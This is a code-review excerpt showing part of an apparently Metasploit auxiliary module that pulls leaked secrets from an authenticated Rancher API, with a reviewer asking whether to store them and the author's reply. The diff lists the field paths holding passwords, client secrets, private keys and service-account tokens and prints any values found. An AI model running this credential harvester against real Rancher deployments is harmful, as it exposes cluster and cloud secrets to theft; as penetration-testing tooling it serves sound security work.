modules/auxiliary/gather/rancher_authenticated_api_cred_exposure.rb

```diff
@@ -0,0 +1,191 @@
+        }
+      )
+      if res.nil?
+        vprint_error("No response received from #{api_endpoint}")
+        next
+      end
+      next unless res.code == 200
+
+      json_body = res.get_json_document
+      next unless json_body.key? 'data'
+
+      json_body['data'].each do |data|
+        # list taken directly from CVE writeup, however this isn't how the API presents its so we fix it later
+        [
+          'Notifier.SMTPConfig.Password',
+          'Notifier.WechatConfig.Secret',
+          'Notifier.DingtalkConfig.Secret',
+          'Catalog.Spec.Password',
+          'SourceCodeProviderConfig.GithubPipelineConfig.ClientSecret',
+          'SourceCodeProviderConfig.GitlabPipelineConfig.ClientSecret',
+          'SourceCodeProviderConfig.BitbucketCloudPipelineConfig.ClientSecret',
+          'SourceCodeProviderConfig.BitbucketServerPipelineConfig.PrivateKey',
+          'Cluster.Spec.RancherKubernetesEngineConfig.BackupConfig.S3BackupConfig.SecretKey',
+          'Cluster.Spec.RancherKubernetesEngineConfig.PrivateRegistries.Password',
+          'Cluster.Spec.RancherKubernetesEngineConfig.Network.WeaveNetworkProvider.Password',
+          'Cluster.Spec.RancherKubernetesEngineConfig.CloudProvider.VsphereCloudProvider.Global.Password',
+          'Cluster.Spec.RancherKubernetesEngineConfig.CloudProvider.VsphereCloudProvider.VirtualCenter.Password',
+          'Cluster.Spec.RancherKubernetesEngineConfig.CloudProvider.OpenstackCloudProvider.Global.Password',
+          'Cluster.Spec.RancherKubernetesEngineConfig.CloudProvider.AzureCloudProvider.AADClientSecret',
+          'Cluster.Spec.RancherKubernetesEngineConfig.CloudProvider.AzureCloudProvider.AADClientCertPassword',
+          'Cluster.Status.ServiceAccountToken',
+          'ClusterTemplate.Spec.ClusterConfig.RancherKubernetesEngineConfig.PrivateRegistries.Password',
+          'ClusterTemplate.Spec.ClusterConfig.RancherKubernetesEngineConfig.Network.WeaveNetworkProvider.Password',
+          'ClusterTemplate.Spec.ClusterConfig.RancherKubernetesEngineConfig.CloudProvider.VsphereCloudProvider.Global.Password',
+          'ClusterTemplate.Spec.ClusterConfig.RancherKubernetesEngineConfig.CloudProvider.VsphereCloudProvider.VirtualCenter.Password',
+          'ClusterTemplate.Spec.ClusterConfig.RancherKubernetesEngineConfig.CloudProvider.OpenstackCloudProvider.Global.Password',
+          'ClusterTemplate.Spec.ClusterConfig.RancherKubernetesEngineConfig.CloudProvider.AzureCloudProvider.AADClientSecret',
+          'ClusterTemplate.Spec.ClusterConfig.RancherKubernetesEngineConfig.CloudProvider.AzureCloudProvider.AADClientCertPassword'
+        ].each do |leaky_key|
+          leaky_key_fixed = leaky_key.split('.')[1..] # remove first item,
+          leaky_key_fixed = leaky_key_fixed.map { |item| item[0].downcase + item[1..] } # downcase first letter in each word
+          print_good("Found leaked key #{leaky_key}: #{data.dig(*leaky_key_fixed)}") if data.dig(*leaky_key_fixed)
```

Comment:
Should we store these credentials?

Reply:
I wasn't able to configure some/most of them, so matching up all the needed information from all the places (username to go with the password, plus the rhost/service) would be difficult at best. I've left it like this to avoid having to do all that extra guess work